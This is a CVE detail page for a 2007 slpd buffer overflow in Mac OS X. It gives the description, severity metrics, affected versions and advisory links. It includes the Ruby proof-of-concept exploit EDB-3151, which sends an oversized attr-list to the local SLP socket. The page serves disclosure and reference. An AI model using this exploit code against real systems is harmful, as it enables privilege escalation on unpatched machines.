CVE-2007-0355 : Detail

CVE-2007-0355

Overflow
2.01%V4
Local
2007-01-19
00h00 +00:00
2017-10-18
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the Apple Minimal SLP v2 Service Agent (slpd) in Mac OS X 10.4.11 and earlier, including 10.4.8, allows local users, and possibly remote attackers, to gain privileges and possibly execute arbitrary code via a registration request with an invalid attr-list field.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3151

Publication date : 2007-01-17 23h00 +00:00
Author : MoAB
EDB Verified : Yes

#!/usr/bin/ruby # (c) Copyright 2006 Lance M. Havok <lmh [at] info-pull.com> # Kevin Finisterre <kf_lists [at] digitalmunition.com> # All pwnage reserved. # # Proof of concept for MOAB-17-01-2007 # http://projects.info-pull.com/moab/MOAB-17-01-2007.html # # Originally reported to Apple by Kevin, on 08/02/2006. require 'socket' target_path = (ARGV[0] || '/var/run/slp_ipc') slp_socket = UNIXSocket.open(target_path) payload = ("\x58" * 506) payload << [0xdeadbeef].pack("V") # ...it expects a valid mem. address (ex. 0xbffff398) stream = "\x01" + # SrvRqst = 1 "\x00\x13" + # Length of remaining fields? (up to attr-list) "\x04\x00\x00\x00\x00\x00\x00" + "\x00\x02\x00\x00" + # length of scope-list string "\x78\x78" + # <scope-list> "\xff\x03\x00\x00" + # length of attr-list string 0x3ff = 1023 in hex. (payload) # <attr-list> slp_socket.write stream slp_socket.close # milw0rm.com [2007-01-18]

Products Mentioned

Configuraton 0

Apple>>Minimal_slp_service_agent >> Version 10.4.11

    Configuraton 0

    Apple>>Mac_os_x >> Version 10.4.8

    References

    http://securitytracker.com/id?1019359
    Tags : vdb-entry, x_refsource_SECTRACK
    https://www.exploit-db.com/exploits/3151
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://securitytracker.com/id?1017533
    Tags : vdb-entry, x_refsource_SECTRACK
    http://www.osvdb.org/32693
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.vupen.com/english/advisories/2007/0239
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.us-cert.gov/cas/techalerts/TA08-043B.html
    Tags : third-party-advisory, x_refsource_CERT
    http://secunia.com/advisories/23796
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/22101
    Tags : vdb-entry, x_refsource_BID